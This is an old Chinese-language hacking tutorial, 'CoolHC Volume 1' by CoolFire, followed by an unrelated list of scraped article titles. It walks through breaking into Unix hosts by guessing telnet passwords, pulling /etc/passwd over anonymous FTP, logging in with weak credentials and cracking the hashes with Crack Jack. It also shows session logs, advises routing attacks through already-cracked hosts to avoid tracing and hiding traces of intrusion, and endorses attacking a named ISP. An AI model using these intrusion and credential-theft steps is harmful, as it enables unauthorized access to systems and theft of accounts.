CoolHC Volume 1 By CoolFire

这不是一个教学文件, 只是告诉你该如何破解系统, 好让你能够将自己的系统作安全的保护, 如果你能够将这份文件完全看完, 你就能够知道电脑骇客们是如何入侵你的电脑, 我是 CoolFire, 写这篇文章的目的是要让大家明白电脑安全的重要性, 并不是教人 Crack Password 若有人因此文件导致恶意入侵别人的电脑或网路, 本人概不负责 !!

#1 甚么是 Hacking ?

就是入侵电脑! 有甚么好解释的! 大部份有关介绍 Hacker 的书籍或小说及文件等都有清楚的介绍, 沉迷于电脑的人... 破坏... 唉! 一大堆怪解释就是了, 最好不要成为一个 "骇客", 我... 不是!

#2 为甚么要 Hack ?

我们只是为了要了解更多关于系统的技术, 入侵它, 了解它是如何运作的, 试试它的安全性, 然后学着去使用它, 读取系统中有关操作的说明, 学习它的各项操作 !! 为了安全性而作革命!

#3 Hack 守则

1. 不恶意破坏任何的系统, 这样作只会给你带来麻烦.恶意破坏他人的软体将导致法律刑责, 如果你只是使用电脑, 那仅为非法使用!! 注意: 千万不要破坏别人的软体或资料 !!

2. 不修改任何的系统档, 如果你是为了要进入系统而修改它, 请在达到目的后将它改回原状.

3. 不要轻易的将你要 Hack 的站台告诉你不信任的朋友.

4. 不要在 bbs 上谈论你 Hack 的任何事情.

5. 在 Post 文章的时候不要使用真名.

6. 正在入侵的时候, 不要随意离开你的电脑.

7. 不要侵入或破坏政府机关的主机.

8. 不在电话中谈论你 Hack 的任何事情.

9. 将你的笔记放在安全的地方.

10. 想要成为 Hacker 就要真正的 Hacking, 读遍所有有关系统安全或系统漏洞的文件 (英文快点学好)!

11. 已侵入电脑中的帐号不得清除或修改.

12. 不得修改系统档案, 如果为了隐藏自己的侵入而作的修改则不在此限, 但仍须维持原来系统的安全性, 不得因得到系统的控制权而将门户大开 !!

13. 不将你已破解的帐号分享与你的朋友.

#4 破解之道

1. 进入主机中

2. 得到 /etc/passwd

3. 得到系统帐号

4. 得到最高权限

-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-

How 1.

进入主机有好几种方式, 可以经由 Telnet (Port 23) 或 SendMail (Port 25)

或 FTP 或 WWW (Port 80) 的方式进入, 一台主机虽然只有一个地址, 但是它可能同时进行多项服务, 所以如果你只是要 "进入" 该主机, 这些 Port 都是很好的进行方向. 当然还有很多 Port, 但是 DayTime 的 Port 你能拿它作甚么??? 我不知道, 你知道吗?! 底下的示范并不是像写出来的那么容易, 只不过是要让你了解如何进入, 当然其中还有很多问题, 如打错指令...... 等等的毛病... 没有出现在课堂上, 但是我为了面子.... 一定要删掉这些不堪入目的东西嘛...

示范进入主机的方法: (By CoolFire)

(首先要先连上某一台你已经有帐号的 Telnet 主机, 当然最好是假的, 也就是 Crack过的主机, 然后利用它来 Crack 别的主机, 才不会被别人以逆流法查出你的所在)

Digital UNIX (ms.hinet.net) (ttypa)

Password:

Last login: Mon Dec 2 03:24:00 from 255.255.0.0

(我用的是 ms.hinet.net ... 当然是假的罗, 都已经经过修改了啦 !!没有这一台主机啦 !! 别怕 ! 别怕 ! 以下的主机名称都是假的名称, 请同学们要记得 !!)

Digital UNIX V1.2C (Rev. 248); Mon Oct 31 21:23:02 CST 1996

Digital UNIX V1.2C Worksystem Software (Rev. 248)

Digital UNIX Chinese Support V1.2C (rev. 3)

(嗯... 进来了 ! 开始攻击吧 ! 本次的目标是......)

ms.hinet.net> telnet www.fuckyou.hinet.net (Telnet 试试看....)

Trying 111.222.255.255...

Connected to cool.fuckyou.hinet.net.

Escape character is '^]'.

Password:

(没关系, 再来 !!)

cool login: hinet

Password:

cool login:

(都没猜对, 这边用的是猜的方法, 今天运气好像不好)

telnet> close

Connection closed.

(重来, 换个 Port 试试看 !!)

ms.hinet.net> telnet 111.222.255.255 80

Trying 111.222.255.255...

Connected to 111.222.255.255.

Escape character is '^]'.

<HTML>

<HEAD>

<TITLE>Error</TITLE>

</HEAD>

<BODY>

<H1>Error 400</H1>

Invalid request "" (unknown method)

<P><HR><ADDRESS><A HREF="http://www.w3.org">CERN-HTTPD 3.0A</A></ADDRESS>

</BODY>

</HTML>

Connection closed by foreign host.

(哇哩 !! 连密码都没得输入, 真是..... 再来 !! 要有恒心 !!)

feedom.net

(换 FTP Port 试试)

ms.hinet.net> ftp 111.222.255.255

Connected to 111.222.255.255.

220 cool FTP server (Version wu-2.4(1) Tue Aug 8 15:50:43 CDT 1995) ready.

Name (111.222.255.255:FakeName): anonymous

331 Guest login ok, send your complete e-mail address as password.

Password:

230-Welcome, archive user! This is an experimental FTP server. If have any

230-unusual problems, please report them via e-mail to root@cool.com

230-If you do have problems, please try using a dash (-) as the first character

230-of your password -- this will turn off the continuation messages that may

230-be confusing your ftp client.

230-

230 Guest login ok, access restrictions apply.

Remote system type is UNIX.

Using binary mode to transfer files.

(哇 ! 可以用 anonymous 进来耶!! password 部份输入 aaa@ 就好了 !

不要留下足迹喔!!)

ftp> ls

200 PORT command successful.

150 Opening ASCII mode data connection for file list.

etc

pub

usr

bin

lib

incoming

welcome.msg

226 Transfer complete.

(嗯嗯... 太好了 ! 进来了 !! 下一个目标是.....)

ftp> cd etc

250 CWD command successful.

ftp> get passwd (抓回来 !!)

200 PORT command successful.

150 Opening BINARY mode data connection for passwd (566 bytes).

226 Transfer complete.

566 bytes received in 0.56 seconds (0.93 Kbytes/s)

(喔... 这么容易吗??)

ftp> !cat passwd (看看 !!!)

root::0:0:root:/root:/bin/bash

bin:*:1:1:bin:/bin:

daemon:*:2:2:daemon:/sbin:

adm:*:3:4:adm:/var/adm:

lp:*:4:7:lp:/var/spool/lpd:

sync:*:5:0:sync:/sbin:/bin/sync

shutdown:*:6:0:shutdown:/sbin:/sbin/shutdown

halt:*:7:0:halt:/sbin:/sbin/halt

mail:*:8:12:mail:/var/spool/mail:

news:*:9:13:news:/var/spool/news:

uucp:*:10:14:uucp:/var/spool/uucp:

operator:*:11:0:operator:/root:/bin/bash

games:*:12:100:games:/usr/games:

man:*:13:15:man:/usr/man:

postmaster:*:14:12:postmaster:/var/spool/mail:/bin/bash

54com.cn

ftp:*:404:1::/home/ftp:/bin/bash

(哇哩... 是 Shadow 的... 真是出师不利.... )

ftp> bye

221 Goodbye.

(不信邪.... 还是老话, 要有恒心....)

(FTP 不行, 再 Telnet 看看 !!)

ms.hinet.net> telnet www.fuckyou.hinet.net

Trying 111.222.255.255...

Connected to cool.fuckyou.hinet.net.

Escape character is '^]'.

Password:

(又猜错 !!)

cool login: fuckyou

Password:

Last login: Mon Dec 2 09:20:07 from 205.11.122.12

Linux 1.2.13.

Some programming languages manage to absorb change but withstand

progress.

cool:~$

(哇哈哈 !! 哪个笨 root, 用 system name 作 username 连

password 也是 system name.... 总算... 没白玩...)

cool:~$ system

bash: system: command not found

(嗯... 这个 user 的权限好像不大....)

cool:~$ ls

cool:~$ pwd

/home/fuckyou

cool:~$ cd /

cool:/$ ls

Public/ cdrom/ lib/ mnt/ tmp/ www/

README dev/ linux* proc/ usr/

bin/ etc/ local/ root/ var/ 网管联盟www.bitsCN.com

boot/ home/ lost+found/ sbin/

cool:/$ cd etc

telnet> quit

(好想睡呀 !! 不玩了 !! 下节课再开始....)

Connection closed.

ms.hinet.net> exit

(走了 !! 下节课在见啦 !! 今天就上到这里 ! 老师要先下班了 !!)

(有学生说: 骗人! 还没有破解呀!! 胡说 ! 不是已经进来了吗 ???

看看这节课上的是甚么??? ---->进入主机 !! 嗯.....)

-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-

How 2.

上节课抓回来一个 "乱七八糟" 的 /etc/passwd, 你以为我的真那么笨吗?? guest 所

抓回来的能是甚么好东西?? 所以这一节课继续上次的攻击行动. 上节课我们已

经 "猜" 到了一个不是 guest 的 username 及 password. 今天就以它来进入主机瞧瞧

Digital UNIX (ms.hinet.net) (ttypa)

Password:

Last login: Mon Dec 2 03:24:00 from 255.255.0.0

Digital UNIX V1.2C (Rev. 248); Mon Oct 31 21:23:02 CST 1996

Digital UNIX V1.2C Worksystem Software (Rev. 248)

Digital UNIX Chinese Support V1.2C (rev. 3) 中国网管联盟www.bitscn.com

(嗯... 进来了 ! 开始攻击吧 ! 本次的目标是.....呵...)

ms.hinet.net> telnet cool.fuckyou.hinet.net (Telnet 试试看.... 昨天的地址,

有作笔记吧!)

stsvr.showtower.com.tw> telnet cool.fuckyou.hinet.net

Trying 111.222.255.255...

Connected to cool.fuckyou.hinet.net.

Escape character is '^]'.

Password:

cool login: fuckyou

Password: (一样输入 fuckyou)

Last login: Mon Dec 1 12:44:10 from ms.hinet.net

Linux 1.2.13.

cool:~$ cd /etc

cool:/etc$ ls

DIR_COLORS ftpusers localtime resolv.conf

HOSTNAME gateways magic rpc

NETWORKING group mail.rc securetty

NNTP_INEWS_DOMAIN host.conf motd sendmail.cf

X11@ hosts messages/ sendmail.st

XF86Config hosts.allow mtab services

at.deny hosts.deny mtools shells

bootptab hosts.equiv named.boot shutdownp

csh.cshrc hosts.lpd networks snoopy/

csh.login httpd.conf nntpserver slip.hosts

exports inetd.conf passwd snooptab

fastboot inittab passwd.OLD syslog.conf

中国网管联盟www_bitscn_com

fdprm issue passwd.old syslog.pid

fstab ld.so.cache printcap ttys

ftpaccess ld.so.conf profile utmp@

(找寻目标..... 太乱了 ! 懒得找, 再来 ....)

cool:/etc$ ls pa*

passwd passwd.OLD passwd.old

(果然在)

cool:/etc$ more passwd

(看看有没有 Shadow...)

root:acqQkJ2LoYp:0:0:root:/root:/bin/bash

john:234ab56:9999:13:John Smith:/home/john:/bin/john

(正点 ! 一点都没有防备 !!)

cool:/etc$ exit

logout

(走了!.... 换 FTP 上场 !!)

Connection closed by foreign host.

ms.hinet.net> ftp www.fuckyou.hinet.net

Connected to cool.fuckyou.hinet.net.

220 cool FTP server (Version wu-2.4(1) Tue Aug 8 15:50:43 CDT 1995) ready.

Name (www.fuckyou.hinet.net:66126): fuckyou

331 Password required for fuckyou.

Password:

230 User fuckyou logged in.

Remote system type is UNIX.

Using binary mode to transfer files.

ftp> cd /etc

250 CWD command successful.

ftp> get passwd

200 PORT command successful. 54ne.com

150 Opening BINARY mode data connection for passwd (350 bytes).

226 Transfer complete.

350 bytes received in 0.68 seconds (1.9 Kbytes/s)

ftp> !cat passwd

root:acqQkJ2LoYp:0:0:root:/root:/bin/bash

john:234ab56:9999:13:John Smith:/home/john:/bin/john

(看看 ! 呵 ! 假不了 !!......)

ftp> bye

221 Goodbye.

ms.hinet.net> exit

(闪人罗 !! 下课 !!.... 喔慢点, 还有事要说明......)

passwd 的 Shadow 就是把 passwd 放在 shadow 档中, 而你原先在第一节课

所看到的这个格式的 passwd 并不是真正的 passwd....

root::0:0:root:/root:/bin/bash

因为密码的部份没有东西.... 所以拿了也没有用 !! 但这一节课所拿到的东西呢, 像是这样, 有几点需要说明的, 就是它究竟代表着甚么???

john:234ab56:9999:13:John Smith:/home/john:/bin/sh

它以 ":" 分成几个栏位, 各栏位对照如下:

User Name: john

Password:234ab56

User No: 9999

Group No: 13

Real Name: John Smith

Home Dir: /home/john

Shell: /bin/sh

了了吧 ! 了了吧 ! 保留着你千辛万苦所拿到的 passwd, 咱们第三节课再来告诉各位如何使用 Crack Jack 把 passwd 解码.... 呵呵...

zzZZzZzz...

-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-

Crack Jack V1.4 中文使用说明 (By CoolFire 12-1-1996)

嗯... 该到第三课了 !! 累了的同学先去喝口水吧!

这一节课咱们来说说 Crack Jack ! 这可是个解读 /etc/passwd 的好工具喔,

不要告诉我你习惯用

Brute, 拿 Brute 跟 Crack Jack 的速度比比看, 包准你马上投向 Crack Jack 1.4的怀抱, 但请先确定你所使用的是 Crack Jack 1.4, 你可以在 CoolFire 的 Hacker&Mailer Page中拿到这个版本的 Crack Jack ! 这才是真正有用的版本, 速度... 对... 就是这点别人都比不上 !

但还是要讲讲它的缺点... 就是只能在 DOS 跟 OS2 中跑, 如果在 Window 95 上开个 DOS Mode 跑,它可是连理都不会理你的 !

OK! 现在切入正题 ! etc/passwd 拿到手了吧 !! 开始罗 !! 使用 Crack Jack 1.4前所需要的东西有这些 [1] Crack Jack 1.4 (废话...$%^&@@)； [2]/etc/passwd 档案, 你可以在 Unix系统中的 /etc/ 目录中找到 passwd；[3] 字典档 (哪里找, 自己敲... 呵 ClayMore 中有一份 DIC.TXT是有一千多个字的字典, 但比起我的字典可就小巫见大巫了, LetMeIn! 1.0 里面也有, 听

James说 2.0 Release 的时候会有更棒的字典档含入, 期待吧!).... 使用 Crack Jack 1.4前需先确定你所使用的机器是 386 含以上 CPU 的 ! 然后最好有充足的记忆体 !!

开始 Jack 时只要敲入 JACK 即可, 它会问你 PW Name... 输入你的 passwd 档名, Dictionary；Name 输入你的字典档名, Jack 就会开始找了 ! 找到时会告诉你, 也会在 JACK.POT中写入它所找到的密码 !! 但... 有点怪的格式! 如果找到的是具 root 权限的密码, Jack 会告诉你 This is JackAss... 嗯...说脏话了 !! 因为使用 Jack 占用的时间实在太多,如果你中途想要停掉时只要按下 Ctrl-C 即可, 别以为你前功尽弃了! 因为 Jack 有个 Restore 的功能,中断时会自动存档为 RESTORE, 下次要继续这次的寻找只要输入 Jack -Restore:RESTORE 即可 !!当然你也可以为你的 Restore 重新命名 ! Jack 也会找得到的 ... 如 Ren restore restore.HNT之后要再寻找的时后就 Jack -Restore:RESTORE.HNT 即可... Jack 会很自动的 Restore前次所寻找的字符串...继续帮你找下去.... 字典档哪里找: 我的不给你! 可以找别的 Brute Force 之类的程序, 有些里面会附,或是找找其它的 Hacker 地下站看看有没有, 自己编一个, 或找个英汉字典软体将字典的部份解出来,可能要有一点资料栏位及写程序的基础.

[这一节课没有范例] 成功的案例: 找到过某家网路咖啡店的 root 权限密码 ! Jack

好正点呀 !!!

所花的时间: 20 分钟左右... 但也有找了一两天也找不到的..... 呜... 骇客们! 加油吧 !!

再次重申, Crack 别人站台之后不要破坏别人站台中的资料, 此篇文章仅作为教育目的,不主张你随便入侵他人主机.... (当然高-Net 除外, 我恨死它了)... 请勿将这类技术使用于破坏上

(又.....如果第三次世界大战开打, 你可以任意破坏敌国的电脑网路... 我全力支持),最严重的情况(如果你真的很讨厌该主机的话)... 就将它 Shut Down.... 好了! 别太暴力了!

CoolHC Volume 1 By CoolFire相关推荐

Docker 入门系列（7）- Dockerfile 使用（FROM、RUN、CMD、EXPOSE、ENV、ADD、COPY、ENTRYPOINT、VOLUME、WORKDIR）
Dockerfile 是一个文本格式的配置文件,用户可以使用 Dockerfile 来快速创建自定义的镜像. 1. 基本结构 Dockerfile 由一行行命令语句组成,并且支持以 # 开头的注释行. ...
ATS上的hosting.config和volume.config文件解读
为了更加灵活和精细地规划缓存磁盘的空间使用,我们可以更进一步地使用hosting.config和volume.config文件. hosting.config 描述域名和分卷的对应关系: host ...
docker mysql data volume_Docker 持久化存储, Data Volume/Bind Mounting
docker容器, 再启动之后我们可以对其进行修改删除等等. 如果是一个数据库的容器, 里面的数据不想随着这个容器的消失, 而消失. 就需要持久化数据存储. Data Volume 这是 do ...
U盘中毒，无法删除System Volume Information文件夹
情景:U盘中毒,U盘内的文件夹名称变成.exe后缀,且多出一个名为System Volume Information的文件夹,对U盘进行格式化后,所有文件消失,当拔出U盘,再次插入电脑时,发现Syst ...
Volume是如何工作的
在这篇文章中,我会尽最大的努力来解释Volume是如何工作的,并展示一些最佳实践.这篇文章主要是针对那些对Volume不了解的Docker用户,当然有经验的用户也可以通过本文了解一些Volume的细节 ...
Restore Volume 操作 - 每天5分钟玩转 OpenStack（60）
前面我们 backup 了 voluem,今天我们将讨论如何 restore volume. restore 的过程其实很简单,两步走: 在存储节点上创建一个空白 volume. 将 backup 的 ...
Infragistics NetAdvantage 2006 Volume 2 CLR 2.0曲折安装
上个月看到Infragistics NetAdvantage 2006 Volume 2 CLR 2.0(新特性)新鲜出炉,就一直想安装试用.昨天qq上得知已经有人在使用了,赶紧google一个dow ...
Attach Volume 操作（Part II） - 每天5分钟玩转 OpenStack（54）
上一节我们讨论了 attach volume 操作中 cinder-api 的工作,本节讨论 cinder-volume 和 nova-compute 如何将 volume attach 到 Inst ...
U盘中毒了？教你如何删除System Volume Information这个顽固文件夹
不得不说cmd命令很好用呢.最近我的U盘中毒了,格式化都删除不了System Volume Information这个顽固的文件夹,真心伤不起哇!还好现在解决了问题.看来以后得好好对待U盘,不能乱用了 ...
多视图立体几何PatchMatchStereo：DSI与Cost Volume
在上一篇文章:传统多视图立体算法:PatchMatchStereo详解[1]中,我们谈到利用在视差空间对每一个像素随机一个视差平面,然后通过传播这个视差平面参数,使得每一个像素经过周围像素影响以得到更 ...

CoolHC Volume 1 By CoolFire

CoolHC Volume 1 By CoolFire相关推荐

最新文章

热门文章